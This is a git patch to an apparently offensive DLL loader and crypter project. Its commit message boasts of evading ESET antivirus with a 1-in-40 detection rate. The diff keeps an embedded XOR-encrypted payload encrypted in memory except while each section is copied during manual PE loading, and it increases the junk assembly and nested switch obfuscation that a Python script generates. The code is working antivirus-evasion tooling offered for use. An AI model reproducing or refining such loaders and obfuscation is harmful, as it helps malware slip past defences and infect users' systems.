From 49a4b62f0fe0aa9a22889fee56417f4b2242c057 Mon Sep 17 00:00:00 2001
From: ALittlePatate <maxime@patate.dev>
Date: Thu, 21 Sep 2023 11:05:13 +0200
Subject: [PATCH] only decrypt stuff when using them, 1/40 detect

fuck ESET, i got you ! https://kleenscan.com/scan_result/a58d3cad2abdfbb7a93b77deefd8dff4eed3a88af6e70d405768ed9c87dc8027
---
 DllExecutor.vcxproj |  1 +
 gui.py              |  4 ++--
 main.cpp            | 31 ++++++++++++++++++-------------
 obfuscation.py      |  8 ++++----
 4 files changed, 25 insertions(+), 19 deletions(-)

diff --git a/DllExecutor.vcxproj b/DllExecutor.vcxproj
index 7768f06..7790671 100644
--- a/DllExecutor.vcxproj
+++ b/DllExecutor.vcxproj
@@ -109,6 +109,7 @@
       <Optimization>Disabled</Optimization>
       <WholeProgramOptimization>false</WholeProgramOptimization>
       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
     </ClCompile>
     <Link>
       <SubSystem>Windows</SubSystem>
diff --git a/gui.py b/gui.py
index 7f228d6..83a2ae6 100644
--- a/gui.py
+++ b/gui.py
@@ -85,7 +85,7 @@ class Ui_mainWindow(object):
         self.spinBox = QtWidgets.QSpinBox(self.centralwidget)
         self.spinBox.setGeometry(QtCore.QRect(155, 118, 42, 22))
         self.spinBox.setObjectName("spinBox")
-        self.spinBox.setValue(8)
+        self.spinBox.setValue(2)
         self.spinBox.setMinimum(1)
         self.label_3 = QtWidgets.QLabel(self.centralwidget)
         self.label_3.setGeometry(QtCore.QRect(120, 122, 47, 13))
@@ -96,7 +96,7 @@ class Ui_mainWindow(object):
         self.spinBox_2 = QtWidgets.QSpinBox(self.centralwidget)
         self.spinBox_2.setGeometry(QtCore.QRect(155, 138, 42, 22))
         self.spinBox_2.setObjectName("spinBox_2")
-        self.spinBox_2.setValue(3)
+        self.spinBox_2.setValue(8)
         self.spinBox_2.setMinimum(1)
         self.checkBox_3 = QtWidgets.QCheckBox(self.centralwidget)
         self.checkBox_3.setGeometry(QtCore.QRect(20, 140, 91, 16))
diff --git a/main.cpp b/main.cpp
index ebeb1d0..fd3637c 100644
--- a/main.cpp
+++ b/main.cpp
@@ -30,6 +30,18 @@ Works with :
 - Doesn't copy headers
 */
 
+void decrypt(const char* key, int offset = 0, int limit = -1) {
+	//START
+    size_t key_size = strlen(key);
+    const int bufferSize = sizeof(sample) / sizeof(sample[0]);
+    if (limit == -1) limit = bufferSize;
+	if (key_size == 0) return;
+    for (int i = offset; i < limit ; i++) {
+        sample[i] ^= key[i%key_size];
+    }
+	//END
+}
+
 // This function will load a DLL from a buffer into the current process.
 // The DLL is expected to be in the PE format.
 //
@@ -48,6 +60,8 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
         return NULL;
     }
 
+	decrypt(KEY, 0, 1024); // decrypt only the header
+	
     // Get a pointer to the DOS header.
     const IMAGE_DOS_HEADER* dos_header = static_cast<const IMAGE_DOS_HEADER*>(dll_buffer);
 
@@ -79,8 +93,10 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
     // Copy the section data to the allocated memory.
     for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
         const IMAGE_SECTION_HEADER* section_header = section_headers + i;
+		decrypt(KEY, section_header->PointerToRawData, section_header->PointerToRawData + section_header->SizeOfRawData); //decrypt section
         memcpy(static_cast<char*>(image_base) + section_header->VirtualAddress, static_cast<const char*>(dll_buffer) + section_header->PointerToRawData, section_header->SizeOfRawData);
-    }
+		decrypt(KEY, section_header->PointerToRawData, section_header->PointerToRawData + section_header->SizeOfRawData); //encrypt back section
+	}
     
     DEBUG_PRINTF("[+] Wrote section data\n");
 
@@ -217,16 +233,6 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
 	//END
 }
 
-void decrypt(const char* key) {
-	//START
-    size_t key_size = strlen(key);
-	if (key_size == 0) return;
-    for (int i = 0; i < sizeof(sample) / sizeof(sample[0]); i++) {
-        sample[i] ^= key[i%key_size];
-    }
-	//END
-}
-
 void allo() {
 	//START
     AllocConsole();
@@ -251,8 +257,7 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR     lpCm
 
     // Load the DLL from a buffer in memory
     const int bufferSize = sizeof(sample) / sizeof(sample[0]);
-
-    decrypt(KEY);
+	
     HMODULE dll = RunPE(sample, bufferSize, NEW_ADDRESS);
     if (dll == NULL) {
         DEBUG_PRINTF("[-] Failed to load DLL\n");
diff --git a/obfuscation.py b/obfuscation.py
index a7dc964..4a7bf4d 100644
--- a/obfuscation.py
+++ b/obfuscation.py
@@ -81,7 +81,7 @@ def GetAsmBlock(branch1, branch2, var, end, sub) :
 	"""+branch1+""":"""
     
     
-    if GetRandomRange(0, 4) > 2 :
+    if GetRandomRange(0, 4) > 1 :
         branch1 = GetRandomString(20)
         branch2_ = GetRandomString(20)
         asm_block += GetAsmBlock(branch1, branch2_, var, end, sub)
@@ -102,7 +102,7 @@ def GetRandomAssemblyBlock() :
 
     r = """const char* """+var+""" = \""""+GetRandomString(5)+"""\";\n__asm {"""
     
-    for i in range(GetRandomRange(0, 15)) :
+    for i in range(GetRandomRange(0, 30)) :
         branch1 = GetRandomString(20)
         branch2 = GetRandomString(20)
         end = GetRandomString(20)
@@ -115,11 +115,11 @@ def generate_switch_statement(variable_name, exit_value, depth=0):
     indent = "    " * depth
     switch_code = f"{indent}switch ({variable_name}) {{\n"
 
-    num_cases = GetRandomRange(1, 4)
+    num_cases = GetRandomRange(2, 5)
     for _ in range(num_cases):
         case_value = GetRandomRange(1, 10**6)
         switch_code += f"{indent}  case {case_value}:\n"
-        if depth < 2 and GetRandomRange(0, 4) > 2 :
+        if depth < 2 and GetRandomRange(0, 4) > 1 :
             switch_code += generate_switch_statement(variable_name, exit_value, depth + 1)
         else:
             switch_code += f"{indent}    {{\n"